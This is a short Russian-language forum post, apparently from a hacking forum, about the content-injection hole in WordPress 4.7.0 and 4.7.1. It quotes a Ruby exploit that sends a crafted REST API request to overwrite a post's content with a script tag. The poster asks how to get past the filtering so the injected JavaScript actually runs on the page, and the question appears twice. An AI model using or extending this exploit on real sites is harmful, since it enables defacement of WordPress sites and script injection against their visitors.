В WP 4.7.0 и 4.7.1 есть дыра позволяющая заменить контент на странице.
Есть сплойт:
В сплойте есть строки:
При эксплуатации строка <script>console.log(1)</script> превращяется в текст: console.log(1), в HTML это выглядит так: <p>console.log(1)</p>.
Есть способ это пофиксить и отгрузить как JS, чтобы он выполнился?
Есть сплойт:
Ссылка скрыта от гостей
В сплойте есть строки:
Ruby:
response = RestClient.post(
"#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}",
{
"id" => "#{postid}justrawdata",
#"title" => "You have been hacked",
"content" => "<script>console.log(1)</script>"
}.to_json,
:content_type => :json,
:accept => :json
) {|response, request, result| response }Есть способ это пофиксить и отгрузить как JS, чтобы он выполнился?